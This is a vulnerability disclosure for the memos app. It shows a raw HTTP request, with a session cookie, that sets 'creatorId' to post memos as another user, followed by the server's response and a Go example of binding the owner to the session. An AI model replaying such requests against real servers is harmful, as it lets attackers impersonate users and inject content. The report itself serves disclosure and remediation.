API Security Blog

An attacker can post messages to other users' memos pages

# Description
An attacker can post malicious content to another user's memos page via a POST request: the attacker just adds a `creatorId` field to the request body and sends it with Burp Suite.

**Here is the video PoC**: https://drive.google.com/file/d/1dNKo-ybfguam4YdvmluYujN2nkTG5D9G/view?usp=share_link

# Proof of Concept
```
POST /api/memo HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjA0OTc2MnxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfLUE9fO9PeYJaiVNyk3XeLr92UBxuKGY5S-4YXFqSUSCvaAvB
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
"creatorId":104,
"content":"post this message in demouser wall ","visibility":"PRIVATE",
"resourceIdList":[]
}
```
# Server Response:
```
HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":1054,"rowStatus":"NORMAL","creatorId":104,"createdTs":1672050590,"updatedTs":1672050590,"content":"post this message in demouser wall ","visibility":"PRIVATE","pinned":false,"displayTs":1672050590,"creator":{"id":104,"rowStatus":"NORMAL","createdTs":1672035458,"updatedTs":1672035527,"username":"demouser","role":"USER","email":"","nickname":"demouser","openId":"","userSettingList":null},"resourceList":[]}}
```
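
The response above shows the server storing the `creatorId` taken from the request body. The following added example (not code from the memos project or from the original report) contrasts a handler that trusts that field with one that takes the memo owner from the authenticated session. The type and function names, and the session user id 101, are assumptions made for illustration.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// MemoCreate mirrors the JSON fields used in the request body above.
type MemoCreate struct {
	CreatorID  int    `json:"creatorId"`
	Content    string `json:"content"`
	Visibility string `json:"visibility"`
}

var ErrForbidden = errors.New("creatorId does not match session user")

// createMemoTrusting models the flaw: the owner is whatever the body says.
func createMemoTrusting(sessionUserID int, body []byte) (MemoCreate, error) {
	var m MemoCreate
	err := json.Unmarshal(body, &m)
	return m, err
}

// createMemoBound rejects a creatorId that names another user and always
// sets the owner from the session, so the body field can never choose it.
func createMemoBound(sessionUserID int, body []byte) (MemoCreate, error) {
	var m MemoCreate
	if err := json.Unmarshal(body, &m); err != nil {
		return MemoCreate{}, err
	}
	if m.CreatorID != 0 && m.CreatorID != sessionUserID {
		return MemoCreate{}, ErrForbidden
	}
	m.CreatorID = sessionUserID
	return m, nil
}

func main() {
	// Constructed input: hypothetical session user 101 sends the PoC body.
	body := []byte(`{"creatorId":104,"content":"post this message in demouser wall ","visibility":"PRIVATE","resourceIdList":[]}`)
	m, _ := createMemoTrusting(101, body)
	fmt.Println("trusting handler stores creatorId:", m.CreatorID)
	_, err := createMemoBound(101, body)
	fmt.Println("bound handler:", err)
}
```

Rejecting the mismatch with an error, rather than silently overwriting it, also gives the server a log event to alert on.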
